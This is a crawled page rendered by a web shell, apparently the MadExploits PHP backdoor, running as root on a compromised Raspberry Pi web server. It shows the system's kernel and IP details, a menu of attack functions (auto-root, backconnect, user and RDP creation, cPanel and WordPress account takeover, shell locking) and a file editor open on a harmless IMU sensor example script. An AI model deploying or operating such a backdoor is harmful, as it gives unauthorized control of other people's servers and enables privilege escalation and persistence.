Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
sense-hat /
examples /
RTIMULib /
python /
[ HOME SHELL ]
Name
Size
Permission
Action
Fusion.py
1.07
KB
-rwxr-xr-x
Fusion10.py
2.25
KB
-rwxr-xr-x
Fusion11.py
2.82
KB
-rwxr-xr-x
InjectIMU.py
1.13
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : InjectIMU.py
#!/usr/bin/python import sys, getopt sys.path.append('.') import RTIMU import os.path import time import math # Note: timestamp is in microseconds timestamp = 0 SETTINGS_FILE = "RTIMULib" print("Using settings file " + SETTINGS_FILE + ".ini") if not os.path.exists(SETTINGS_FILE + ".ini"): print("Settings file does not exist, will be created") s = RTIMU.Settings(SETTINGS_FILE) imu = RTIMU.RTIMU(s) imu.IMUInit() print("IMU Name: " + imu.IMUName()) # set some gyro rate here to test (units: rads/s) gx = 0.0 gy = 0.0 gz = 0.1 # set accel to indicate horizontal (units: g) ax = 0.0 ay = 0.0 az = 1.0 # set mag to whatever (or leave as 0 if turned off) (units: uT) mx = 0.0 my = 0.0 mz = 0.0 # this is how to turn off the magnetometer imu.setCompassEnable(False) # everything is now ready while True: print("gz: %f" % gz) imu.setExtIMUData(gx, gy, gz, ax, ay, az, mx, my, mz, timestamp) data = imu.getIMUData() fusionPose = data["fusionPose"] print("r: %f p: %f y: %f" % (math.degrees(fusionPose[0]), math.degrees(fusionPose[1]), math.degrees(fusionPose[2]))) time.sleep(0.1) timestamp += 100000
Close